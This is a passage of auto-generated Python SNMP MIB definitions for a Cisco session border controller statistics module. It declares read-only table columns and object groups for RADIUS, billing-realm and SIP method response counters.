'csbCallStatsServiceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsRealmName')) if mibBuilder.loadTexts: csbRfBillRealmStatsEntry.setStatus('current') csb_rf_bill_realm_stats_index = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 1), unsigned32().subtype(subtypeSpec=value_range_constraint(0, 31))) if mibBuilder.loadTexts: csbRfBillRealmStatsIndex.setStatus('current') csb_rf_bill_realm_stats_realm_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 2), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsRealmName.setStatus('current') csb_rf_bill_realm_stats_total_start_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 3), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsTotalStartAcrs.setStatus('current') csb_rf_bill_realm_stats_total_interim_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 4), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsTotalInterimAcrs.setStatus('current') csb_rf_bill_realm_stats_total_stop_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 5), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsTotalStopAcrs.setStatus('current') csb_rf_bill_realm_stats_total_event_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 6), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsTotalEventAcrs.setStatus('current') csb_rf_bill_realm_stats_succ_start_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 7), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsSuccStartAcrs.setStatus('current') csb_rf_bill_realm_stats_succ_interim_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 8), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsSuccInterimAcrs.setStatus('current') csb_rf_bill_realm_stats_succ_stop_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 9), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsSuccStopAcrs.setStatus('current') csb_rf_bill_realm_stats_succ_event_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 10), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsSuccEventAcrs.setStatus('current') csb_rf_bill_realm_stats_fail_start_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 11), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsFailStartAcrs.setStatus('current') csb_rf_bill_realm_stats_fail_interim_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 12), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsFailInterimAcrs.setStatus('current') csb_rf_bill_realm_stats_fail_stop_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 13), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsFailStopAcrs.setStatus('current') csb_rf_bill_realm_stats_fail_event_acrs = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 2, 1, 14), unsigned32()).setUnits('ACRs').setMaxAccess('readonly') if mibBuilder.loadTexts: csbRfBillRealmStatsFailEventAcrs.setStatus('current') csb_sip_mthd_current_stats_table = mib_table((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3)) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsTable.setStatus('current') csb_sip_mthd_current_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1)).setIndexNames((0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsServiceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsAdjName'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsMethod'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsInterval')) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsEntry.setStatus('current') csb_sip_mthd_current_stats_adj_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 1), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsAdjName.setStatus('current') csb_sip_mthd_current_stats_method = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 2), cisco_sbc_sip_method()) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsMethod.setStatus('current') csb_sip_mthd_current_stats_interval = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 3), cisco_sbc_periodic_stats_interval()) if mibBuilder.loadTexts: csbSIPMthdCurrentStatsInterval.setStatus('current') csb_sip_mthd_current_stats_method_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 4), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsMethodName.setStatus('current') csb_sip_mthd_current_stats_req_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 5), gauge32()).setUnits('requests').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsReqIn.setStatus('current') csb_sip_mthd_current_stats_req_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 6), gauge32()).setUnits('requests').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsReqOut.setStatus('current') csb_sip_mthd_current_stats_resp1xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 7), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp1xxIn.setStatus('current') csb_sip_mthd_current_stats_resp1xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 8), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp1xxOut.setStatus('current') csb_sip_mthd_current_stats_resp2xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 9), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp2xxIn.setStatus('current') csb_sip_mthd_current_stats_resp2xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 10), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp2xxOut.setStatus('current') csb_sip_mthd_current_stats_resp3xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 11), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp3xxIn.setStatus('current') csb_sip_mthd_current_stats_resp3xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 12), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp3xxOut.setStatus('current') csb_sip_mthd_current_stats_resp4xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 13), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp4xxIn.setStatus('current') csb_sip_mthd_current_stats_resp4xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 14), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp4xxOut.setStatus('current') csb_sip_mthd_current_stats_resp5xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 15), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp5xxIn.setStatus('current') csb_sip_mthd_current_stats_resp5xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 16), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp5xxOut.setStatus('current') csb_sip_mthd_current_stats_resp6xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 17), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp6xxIn.setStatus('current') csb_sip_mthd_current_stats_resp6xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 3, 1, 18), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdCurrentStatsResp6xxOut.setStatus('current') csb_sip_mthd_history_stats_table = mib_table((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4)) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsTable.setStatus('current') csb_sip_mthd_history_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1)).setIndexNames((0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsServiceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsAdjName'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsMethod'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsInterval')) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsEntry.setStatus('current') csb_sip_mthd_history_stats_adj_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 1), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsAdjName.setStatus('current') csb_sip_mthd_history_stats_method = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 2), cisco_sbc_sip_method()) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsMethod.setStatus('current') csb_sip_mthd_history_stats_interval = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 3), cisco_sbc_periodic_stats_interval()) if mibBuilder.loadTexts: csbSIPMthdHistoryStatsInterval.setStatus('current') csb_sip_mthd_history_stats_method_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 4), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsMethodName.setStatus('current') csb_sip_mthd_history_stats_req_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 5), gauge32()).setUnits('requests').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsReqIn.setStatus('current') csb_sip_mthd_history_stats_req_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 6), gauge32()).setUnits('requests').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsReqOut.setStatus('current') csb_sip_mthd_history_stats_resp1xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 7), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp1xxIn.setStatus('current') csb_sip_mthd_history_stats_resp1xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 8), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp1xxOut.setStatus('current') csb_sip_mthd_history_stats_resp2xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 9), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp2xxIn.setStatus('current') csb_sip_mthd_history_stats_resp2xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 10), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp2xxOut.setStatus('current') csb_sip_mthd_history_stats_resp3xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 11), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp3xxIn.setStatus('current') csb_sip_mthd_history_stats_resp3xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 12), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp3xxOut.setStatus('current') csb_sip_mthd_history_stats_resp4xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 13), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp4xxIn.setStatus('current') csb_sip_mthd_history_stats_resp4xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 14), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp4xxOut.setStatus('current') csb_sip_mthd_history_stats_resp5xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 15), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp5xxIn.setStatus('current') csb_sip_mthd_history_stats_resp5xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 16), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp5xxOut.setStatus('current') csb_sip_mthd_history_stats_resp6xx_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 17), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp6xxIn.setStatus('current') csb_sip_mthd_history_stats_resp6xx_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 4, 1, 18), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdHistoryStatsResp6xxOut.setStatus('current') csb_sip_mthd_rc_current_stats_table = mib_table((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5)) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsTable.setStatus('current') csb_sip_mthd_rc_current_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1)).setIndexNames((0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsServiceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsAdjName'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsMethod'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsRespCode'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsInterval')) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsEntry.setStatus('current') csb_sip_mthd_rc_current_stats_adj_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 1), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsAdjName.setStatus('current') csb_sip_mthd_rc_current_stats_method = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 2), cisco_sbc_sip_method()) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsMethod.setStatus('current') csb_sip_mthd_rc_current_stats_resp_code = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 3), unsigned32()) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsRespCode.setStatus('current') csb_sip_mthd_rc_current_stats_interval = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 4), cisco_sbc_periodic_stats_interval()) if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsInterval.setStatus('current') csb_sip_mthd_rc_current_stats_method_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 5), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsMethodName.setStatus('current') csb_sip_mthd_rc_current_stats_resp_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 6), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsRespIn.setStatus('current') csb_sip_mthd_rc_current_stats_resp_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 5, 1, 7), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCCurrentStatsRespOut.setStatus('current') csb_sip_mthd_rc_history_stats_table = mib_table((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6)) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsTable.setStatus('current') csb_sip_mthd_rc_history_stats_entry = mib_table_row((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1)).setIndexNames((0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsInstanceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-CALL-STATS-MIB', 'csbCallStatsServiceIndex'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsAdjName'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsMethod'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsRespCode'), (0, 'CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsInterval')) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsEntry.setStatus('current') csb_sip_mthd_rc_history_stats_adj_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 1), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsAdjName.setStatus('current') csb_sip_mthd_rc_history_stats_method = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 2), cisco_sbc_sip_method()) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsMethod.setStatus('current') csb_sip_mthd_rc_history_stats_method_name = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 3), snmp_admin_string()).setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsMethodName.setStatus('current') csb_sip_mthd_rc_history_stats_resp_code = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 4), unsigned32()) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsRespCode.setStatus('current') csb_sip_mthd_rc_history_stats_interval = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 5), cisco_sbc_periodic_stats_interval()) if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsInterval.setStatus('current') csb_sip_mthd_rc_history_stats_resp_in = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 6), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsRespIn.setStatus('current') csb_sip_mthd_rc_history_stats_resp_out = mib_table_column((1, 3, 6, 1, 4, 1, 9, 9, 757, 1, 6, 1, 7), gauge32()).setUnits('responses').setMaxAccess('readonly') if mibBuilder.loadTexts: csbSIPMthdRCHistoryStatsRespOut.setStatus('current') csb_stats_mib_compliances = mib_identifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 1)) csb_stats_mib_groups = mib_identifier((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2)) csb_stats_mib_compliance = module_compliance((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 1, 1)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsGroup'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsGroup'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsGroup'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsGroup'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCHistoryStatsGroup'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdRCCurrentStatsGroup')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_stats_mib_compliance = csbStatsMIBCompliance.setStatus('current') csb_radius_stats_group = object_group((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 1)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsClientName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsClientType'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsSrvrName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsAcsReqs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsAcsRtrns'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsAcsAccpts'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsAcsRejects'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsAcsChalls'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsActReqs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsActRetrans'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsActRsps'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsMalformedRsps'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsBadAuths'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsPending'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsTimeouts'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsUnknownType'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRadiusStatsDropped')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_radius_stats_group = csbRadiusStatsGroup.setStatus('current') csb_rf_bill_realm_stats_group = object_group((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 2)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsRealmName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsTotalStartAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsTotalInterimAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsTotalStopAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsTotalEventAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsSuccStartAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsSuccInterimAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsSuccStopAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsSuccEventAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsFailStartAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsFailInterimAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsFailStopAcrs'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbRfBillRealmStatsFailEventAcrs')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_rf_bill_realm_stats_group = csbRfBillRealmStatsGroup.setStatus('current') csb_sip_mthd_current_stats_group = object_group((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 3)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsAdjName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsMethodName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsReqIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsReqOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp1xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp1xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp2xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp2xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp3xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp3xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp4xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp4xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp5xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp5xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp6xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdCurrentStatsResp6xxOut')) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): csb_sip_mthd_current_stats_group = csbSIPMthdCurrentStatsGroup.setStatus('current') csb_sip_mthd_history_stats_group = object_group((1, 3, 6, 1, 4, 1, 9, 9, 757, 2, 2, 4)).setObjects(('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsAdjName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsMethodName'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsReqIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsReqOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp1xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp1xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp2xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp2xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp3xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp3xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp4xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp4xxOut'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp5xxIn'), ('CISCO-SESS-BORDER-CTRLR-STATS-MIB', 'csbSIPMthdHistoryStatsResp5xxOut'), 